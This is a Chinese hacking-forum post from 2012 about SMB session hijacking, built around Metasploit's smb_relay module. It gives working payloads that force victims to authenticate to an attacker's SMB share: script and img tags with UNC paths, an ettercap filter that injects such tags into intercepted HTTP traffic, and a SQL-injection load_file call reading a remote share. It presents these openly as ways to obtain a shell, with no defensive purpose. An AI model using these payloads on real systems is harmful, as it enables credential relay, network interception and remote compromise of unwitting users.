切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
159 smb会话劫持2[复制链接]
发表于 2012-10-1 23:23:17 | 显示全部楼层 |!read_mode!
Metasploit有个强大的SMB利用模块
  1. msf > use exploit/windows/smb/smb_relay
  2. msf  exploit(smb_relay) >
复制代码

生成很简单,咋利用就困单了,这个需要大家思考

1.HTML

我们可以在HTML中插入这样的语句:

js :

  1. <script language='Javascript' src="\\1.1.1.1\c$"></script>
复制代码
html:

  1. <img src="file://1.1.1.1/c$/4373.JPG">
复制代码
ettercap:

  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.    if (search(DATA.data, "Accept-Encoding")) {
  3.       replace("Accept-Encoding", "Accept-Rubbish!");
  4.           # note: replacement string is same length as original string
  5.       msg("zapped Accept-Encoding!\n");
  6.    }
  7. }
  8. if (ip.proto == TCP && tcp.src == 80) {
  9.    replace("</body>", "<img src=\"\\\\192.168.1.55\\image.jpg\"><img src=\"file://///192.168.1.55/image.jpg\"> </body>" ");
  10.    replace("</Body>", "<img src=\"\\\\192.168.1.55\\image.jpg\"><img src=\"file://///192.168.1.55/image.jpg\"> </body>" ");
  11.    msg("Filter Ran.\n");
  12. }
复制代码
2.数据库注入注入中是能读文件的 我们可以利用他读共享
  1. select load_file('\\\\1.1.1.1\\c$\\1.txt')
复制代码
http://www.3g-sec.com/shiping/out-3.flv
3.文档中插入邪恶代码目的是让他访问我们的 共享 我们就能获得SHELL
例如:http://fuzzexp.org/a-link-to-an-attack.html会话劫持例如: http://www.3g-sec.com/thread-309-1-2.html

更多的东西办法 等待你的发现!




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-21 09:42

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部